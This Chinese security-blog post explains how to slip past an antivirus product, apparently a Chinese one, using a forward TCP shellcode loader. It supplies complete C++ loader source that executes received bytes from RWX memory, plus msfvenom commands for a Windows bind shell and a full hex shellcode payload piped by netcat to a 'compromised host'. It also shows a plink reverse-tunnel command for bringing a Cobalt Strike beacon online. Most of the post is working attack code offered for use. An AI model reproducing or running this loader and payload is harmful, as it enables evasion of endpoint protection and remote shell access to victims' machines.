登陆 注册

基于TCP正向端口来bypass 某数字软件

山兮 2020-11-09
黑白网(heibai.org)成立于2014年,多年来以其专业的视角,优质的服务为广大安全技术爱好者提供了目前国内最全的网络安全技术学习资料,普及中国网络安全知识,宣扬正确的黑客极客文化,全方面提高国内安全技术水平。

源码:



//#include "pch.h"#include<WinSock2.h>#include<WS2tcpip.h>#include<iostream>#include<Windows.h>#pragmacomment(lib, "ws2_32.lib")
int main(intargc, char* argv[]){   LPWSADATAwsaData = newWSAData();   ADDRINFOA*socketHint = newADDRINFOA();   ADDRINFOA*addressInfo = newADDRINFOA();   SOCKETlistenSocket = INVALID_SOCKET;   SOCKETclientSocket = INVALID_SOCKET;   CHARbufferReceivedBytes[4096] = { 0 };   INTreceivedBytes = 0;   PCSTR port= argv[1];
if (argv[1] == 0) {std::cout <<"tcpshell.exe 443"<< std::endl;return 0;  }

  socketHint->ai_family = AF_INET;   socketHint->ai_socktype = SOCK_STREAM;   socketHint->ai_protocol = IPPROTO_TCP;   socketHint->ai_flags = AI_PASSIVE;
  WSAStartup(MAKEWORD(2,2), wsaData);   GetAddrInfoA(NULL, port, socketHint,&addressInfo);
  listenSocket = socket(addressInfo->ai_family,addressInfo->ai_socktype, addressInfo->ai_protocol);   bind(listenSocket, addressInfo->ai_addr, addressInfo->ai_addrlen);   listen(listenSocket, SOMAXCONN);std::cout <<"Listening on TCP port "<< port << std::endl;
  clientSocket = accept(listenSocket, NULL, NULL);std::cout <<"Incoming connection..."<< std::endl;
  receivedBytes = recv(clientSocket, bufferReceivedBytes, sizeof(bufferReceivedBytes),NULL);if(receivedBytes > 0) {std::cout <<"Received bytes "<< receivedBytes << std::endl;   }
  LPVOIDshellcode = VirtualAlloc(NULL, receivedBytes, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);std::cout <<"Allocated memory for  at: "<< shellcode << std::endl;
memcpy(shellcode, bufferReceivedBytes, sizeof(bufferReceivedBytes));std::cout <<"Copied shellcode to: "<< shellcode << std::endl <<"Sending back session...";   ((void(*)())shellcode)();
return 0;}


编译好使用方法:

输入你监听的端口即可

由于是正向的利用比较麻烦,这里写两个利用的方法

1. Msf生成正向shell利用



msfvenom -pwindows/shell_bind_tcp LHOST=0.0.0.0 LPORT=1246 -f  c > /tmp/bind_shell.c


生成一个正向端口1246的shellcode.

然后向肉鸡发送shellcode。


处理一下




echo -e "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x04\xde\x00\x00\x00\x00\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\xc2\xdb\x37\x67\xff\xd5\x48\x31\xd2\x48\x89\xf9\x41\xba\xb7\xe9\x38\xff\xff\xd5\x4d\x31\xc0\x48\x31\xd2\x48\x89\xf9\x41\xba\x74\xec\x3b\xe1\xff\xd5\x48\x89\xf9\x48\x89\xc7\x41\xba\x75\x6e\x4d\x61\xff\xd5\x48\x81\xc4\xa0\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5" | nc 172.16.3.145 444


或者是更加简单的方法:



msfvenom -pwindows/shell_bind_tcp LHOST=0.0.0.0 LPORT=1246 -f  raw > /tmp/bind_shell.bin


因为这里我使用的是x86平台编译出来的,shellcode或者bin文件也得是x86



catbind_shell.bin | nc 172.16.3.145 444


连接1246端口即可返回cmd

2. 利用plink转发端口配合Cs上线(反向)



echo y| plink -N -R 0.0.0.0:9987:127.0.0.1:446 testssh@马.赛.克.252 -P 22 -pw 马赛克


转发出来后生成cs bin文件

向转反出来的端口发送shellcode

上线


参考链接:

https://www.ired.team/offensive-security/defense-evasion/bypassing-windows-defender-one-tcp-socket-away-from-meterpreter-and-cobalt-strike-beacon


生成海报
请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By HeiBaiTeam.